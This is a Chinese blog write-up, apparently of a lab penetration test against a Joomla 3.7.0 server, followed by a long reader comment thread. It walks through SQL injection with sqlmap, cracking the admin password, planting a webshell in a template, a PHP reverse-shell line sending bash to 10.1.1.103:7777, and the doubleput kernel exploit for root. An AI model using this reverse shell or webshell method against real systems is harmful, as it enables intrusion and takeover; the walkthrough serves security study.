记一次对 Joomla CMS 渗透过程

2019年10月11日 17:24:54OnionT@KillBoy

OnionT@KillBoy

作者

关注

47
文章

0
粉丝

渗透测试4618,7062字数 265阅读0分53秒阅读模式

AI智能摘要

从Joomla 3.7.0的SQL注入漏洞到系统权限突破，这场渗透测试层层递进犹如技术迷宫探险。当普通扫描工具失效时，如何通过命令行精准爆破数据库？又是哪条关键指令成功绕过防火墙实现权限升级？本文完整还原从漏洞利用到提权实战的全过程，为安全研究者揭开渗透测试中那些教科书未载的攻防细节。

— AI 生成的文章内容摘要

首先，对其进行扫描

发现其版本为 Joomla 3.7.0

于是，搜索这个版本的漏洞，，，

发现存在SQL注入漏洞，继续查看详情

上sqlmap跑一波,成功爆库。。。

接下来，爆表

爆用户名密码

在线跑了一下MD5，实在是跑不出来，接下来试试John破解

成功破解，得到密码，登录后台，进入模板写入一句话
访问：http://10.1.1.104/templates/protostar/shell.php 没有问题,菜刀连接

查看权限，发现不是root

接下来进行提权，首先我们查看系统版本，发现是linux 4.4.0，查找一个这个版本的漏洞
试了好几个都不行，发现这个可以

好，我们上传exp

提权、、、、菜刀不好用，写一个反弹PHP文件，反弹回来一个shell

<?php system("bash -c 'bash -i >& /dev/tcp/10.1.1.103/7777 0>&1'"); ?>

本地监听 7777 然后访问：http://10.1.1.104/templates/protostar/cmd.php成功反弹shell

接着继续提权、、、运行如下两个文件

./compile.sh ./doubleput

OK，提权成功。。。

http://www.oniont.cn/index.php/archives/250.html

小猫喵星 0
2026年1月16日 20:05:22 巴基斯坦 1F
回复

这版本也太老了吧，难怪一打一个准
- 安静如水 0
  2026年1月24日 22:37:12 越南 B1
  回复
  
  @ 小猫喵星这版本怕不是还在用XP系统吧…
古道驼铃 0
2026年1月16日 20:06:42 辽宁省大连市 2F
回复

之前搞过类似项目，提权卡三天都没搞定😭
BoldAndBrash 0
2026年1月16日 20:06:42 日本 3F
回复

不是root确实不算彻底成功，但能进后台也算阶段性胜利
熊猫超人 1
2026年1月16日 20:06:42 江苏省盐城市 4F
回复

这操作看着丝滑，其实全是老套路了
话痨の梦 1
2026年1月16日 20:06:42 北京市 5F
回复

菜刀连不上我就换nc，反正PHP一句话通吃
闪耀新星 0
2026年1月16日 20:06:42 山东省滨州市 6F
回复

doubleput那个exp得配合compile.sh用，不然容易崩
水心 0
2026年1月16日 20:06:42 日本 7F
回复

反弹shell那段代码我试了，得先把IP改了才行
奶牛妹 0
2026年1月17日 08:29:17 澳大利亚 8F
回复

菜刀不好用的时候我都直接换msf，省事
烟波江 0
2026年1月17日 10:37:10 辽宁省抚顺市 9F
回复

MD5还能跑出来？这盐值没加吧😂
尴尬癌晚期 0
2026年1月17日 11:28:07 菲律宾 10F
回复

提权那块doubleput是4.4.0的exp吧？求链接
果酱猫 1
2026年1月17日 14:43:40 山东省青岛市 11F
回复

之前搞过joomla，后台模板写shell真方便
烟雨楼 0
2026年1月17日 14:46:16 福建省福州市 12F
回复

不是root也敢叫渗透成功？有点严格了
影梦 0
2026年1月17日 16:28:12 吉林省吉林市 13F
回复

防火墙都没拦一下，这环境是摆设？
寂静深渊 0
2026年1月17日 17:05:50 中国 14F
回复

反弹shell那行php代码我抄了，回头试试
寒江渔 0
2026年1月17日 17:49:57 辽宁省盘锦市 15F
回复

linux提权永远卡在找exp这步，太难了
傲山人 0
2026年1月17日 23:36:50 湖南省永州市 16F
回复

看不懂，但感觉操作很丝滑，666
幻剑游侠 0
2026年1月17日 23:38:46 江苏省连云港市 17F
回复

这版本现在还有人在用？心真大😂
落月摇情 1
2026年1月18日 00:03:56 福建省厦门市 18F
回复

反弹shell那段写得挺清楚，收藏了
豆豆鸟 0
2026年1月18日 08:12:09 北京市 19F
回复

提权成功之后呢，能干啥？
铁画眉 1
2026年1月18日 08:22:03 中国 20F
回复

防火墙跟没有一样，这配置也太随意了
冷眸少年 0
2026年1月18日 17:35:40 广东省深圳市福田区 21F
回复

joomla后台路径也太好猜了吧
摸鱼小能全 1
2026年1月19日 00:42:14 海南省海口市 22F
回复

直接写shell进模板，这后台没审核？
觉醒者 1
2026年1月19日 10:51:52 韩国 23F
回复

跑MD5没出来，密码强度可以啊
古树之灵 1
2026年1月19日 16:05:11 菲律宾 24F
回复

4.4.0的exp现在还能用吗，怕有补丁了
金字塔 1
2026年1月19日 16:26:40 北京市 25F
回复

看截图，工具界面挺复古的
白羊烈火 1
2026年1月20日 12:14:35 山东省济南市 26F
回复

渗透成功是指拿到shell就算吗？
- 小鹿萌萌 0
  2026年1月25日 15:32:18 浙江省嘉兴市 B1
  回复
  
  @ 白羊烈火拿到shell只是开始，后续操作才是重头戏
程派风 1
2026年1月20日 21:17:56 湖南省长沙市 27F
回复

反弹shell那段代码可以直接抄作业👍
影遁游侠 0
2026年1月21日 07:21:30 山东省潍坊市 28F
回复

这渗透过程看着好丝滑，羡慕了
SocialJuggernaut 0
2026年1月21日 09:15:24 内蒙古呼伦贝尔市 29F
回复

4.4.0的exp现在还能用吗？怕有补丁了
梦回星砂 1
2026年1月21日 19:48:11 北京市 30F
回复

之前也搞过joomla，后台写shell确实方便
远途寻梦 1
2026年1月22日 07:54:18 湖北省荆州市 31F
回复

不是root权限也能叫成功？有点严格了吧
LoudAndProud 0
2026年1月22日 12:31:10 广东省云浮市 32F
回复

菜刀用不了的时候我也喜欢换msf
旧海报 0
2026年1月22日 14:07:14 澳大利亚 33F
回复

MD5跑不出来说明密码强度还可以
棉花糖星星 1
2026年1月22日 20:38:05 印度 34F
回复

防火墙跟摆设似的，这配置也太随意了
Dog汪 0
2026年1月23日 07:48:26 四川省攀枝花市 35F
回复

这版本现在还有人用？心真大
小生风华 0
2026年1月23日 09:20:07 上海市 36F
回复

渗透到这就结束了？后面不继续了？
量子幽灵画家 0
2026年1月23日 10:46:04 辽宁省鞍山市 37F
回复

doubleput那个exp求个链接
- 暴走的小蘑菇 1
  2026年1月26日 20:38:32 北京市 B1
  回复
  
  @ 量子幽灵画家 https://www.exploit-db.com/exploits/41886 这个就是doubleput的exp
夜空守望 1
2026年1月24日 15:10:07 日本 38F
回复

反弹shell那段可以再细点吗
- 飞鸿驿使 1
  2026年1月24日 15:25:09 北京市 B1
  回复
  
  @ 夜空守望同求，那段感觉跳得有点快
破碎的浪花 0
2026年1月26日 21:09:16 中国 39F
回复

防火墙开着跟没开一样，管理员真的不背锅？
大熊熊 1
2026年1月27日 23:16:05 福建省莆田市 40F
回复

感觉写shell那段挺稳的，我一般直接丢马
镖帅沈鸿 0
2026年1月28日 16:27:40 河北省石家庄市 41F
回复

求问这个joomla版本现在还能扫到吗？
SchnitzelVonCrumb 1
2026年1月31日 14:40:21 江苏省苏州市 42F
回复

反弹shell那段代码有点眼熟啊

记一次对 Joomla CMS 渗透过程

热门话题

实战仿真靶场Killboy_Team_1——渗透测试过程

Android App渗透测试–Drozer（安装篇）

Bugku-字符？正则？

phpstudy后门漏洞利用payload

发表评论

热门搜索